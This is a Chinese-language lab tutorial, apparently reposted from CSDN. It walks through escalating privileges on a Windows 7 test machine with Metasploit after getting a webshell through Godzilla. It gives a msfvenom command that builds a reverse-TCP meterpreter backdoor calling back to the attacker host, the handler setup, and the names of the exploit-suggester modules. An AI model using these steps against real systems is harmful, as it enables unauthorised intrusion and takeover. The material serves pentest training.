自学内容网 自学内容网

Metaspolit使用篇(三)-Windows提权实例


前言

靶机:

  • 192.168.10.177(Windows 7)
  • phpstudy

攻击机:

  • 192.168.10.132(kali)

一、getshell

通过Web漏洞,已经getshell,通过Webshell工具Godzilla连接。因为是通过phpstudy模拟环境,phpstudy是Windows登录用户启动的,所以直接拿到普通用户的权限。Mandatory Label\Medium Mandatory Level,说明这是一个标准用户。接下来,将权限从普通用户提升到管理员,也就是Mandatory Label\High Mandatory Level
在这里插入图片描述

二、使用MSF提权

  1. msfvenom生成exe格式反弹shell后门msf.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.16.10.132 lport=3333 -f exe -o msf.exe
  1. 利用Godzilla上传后门msf.exe
    在这里插入图片描述
  2. 配置监听会话
    进入msfconsole,执行:
use exploit/multi/handler   
set payload windows/meterpreter/reverse_tcp 
set lhost 0.0.0.0
set lort 3333
  1. 用Godzilla命令执行模块启动后门msf.exe,上线
    在这里插入图片描述
  2. 使用提权信息收集模块
    半自动化:use post/windows/gather/enum_patchs
    全自动化:use post/multi/recon/local_exploit_suggester

使用全自动化的
在这里插入图片描述
6. 使用提权模块
在这里插入图片描述
7. 提权成功
在这里插入图片描述


原文地址:https://blog.csdn.net/weixin_45626840/article/details/142874707

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!